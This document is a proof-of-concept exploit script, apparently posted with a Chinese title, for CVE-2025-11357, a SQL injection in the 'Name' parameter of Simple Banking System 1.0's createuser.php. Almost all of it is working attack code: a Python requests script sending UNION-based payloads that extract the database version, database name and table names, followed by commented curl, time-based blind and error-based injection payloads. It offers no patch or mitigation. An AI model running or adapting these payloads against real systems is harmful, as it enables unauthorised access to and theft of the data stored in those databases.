CVE-2025-11357：Simple Banking System 1.0 SQL注入漏洞

# CVE-2025-11357 - Simple Banking System SQL Injection PoC # Vulnerability: SQL Injection via 'Name' parameter in /createuser.php # Author: Security Researcher # Tested on: Simple Banking System 1.0 import requests import sys # Target configuration TARGET_URL = "http://target.com/createuser.php" # Attacker credentials (low privilege required) SESSION_COOKIES = { "PHPSESSID": "your_session_id_here" } # SQL Injection payload targeting the 'Name' parameter # Payload: Extract database version via UNION-based injection PAYLOAD = "admin' UNION SELECT 1,version(),3,4-- -" def exploit_sql_injection(target_url, payload, cookies): """ Exploit SQL injection in the Name parameter of createuser.php """ headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" } # Data to be submitted - the 'Name' field contains the injection payload data = { "Name": payload, "AccountNo": "1234567890", "Address": "Test Address", "Phone": "1234567890", "Email": "[email protected]", "Password": "password123", "submit": "Submit" } try: response = requests.post( target_url, data=data, headers=headers, cookies=cookies, timeout=10, verify=False ) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") # Check for successful injection indicators if "error" not in response.text.lower() and response.status_code == 200: print("[+] SQL Injection may have succeeded!") print(f"[+] Response snippet: {response.text[:500]}") else: print("[-] Injection attempt may have failed") return response except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def enumerate_database(target_url, cookies): """ Enumerate database information using UNION-based injection """ # Extract current database name payload_db = "test' UNION SELECT 1,database(),3,4-- -" print(f"\n[*] Extracting database name with payload: {payload_db}") exploit_sql_injection(target_url, payload_db, cookies) # Extract table names payload_tables = "test' UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()-- -" print(f"\n[*] Extracting table names with payload: {payload_tables}") exploit_sql_injection(target_url, payload_tables, cookies) if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] print(f"[*] Targeting: {TARGET_URL}") print("[*] CVE-2025-11357 - SQL Injection PoC") print("=" * 60) # Run basic injection test exploit_sql_injection(TARGET_URL, PAYLOAD, SESSION_COOKIES) # Optionally enumerate database # enumerate_database(TARGET_URL, SESSION_COOKIES) # Alternative manual curl command: # curl -X POST "http://target.com/createuser.php" \ # -d "Name=admin' OR '1'='1'-- -&AccountNo=12345&submit=Submit" \ # -b "PHPSESSID=your_session_id" # Time-based blind SQLi alternative payload: # Name=test' AND SLEEP(5)-- - # Error-based SQLi alternative payload: # Name=test' AND extractvalue(1,concat(0x7e,version()))-- -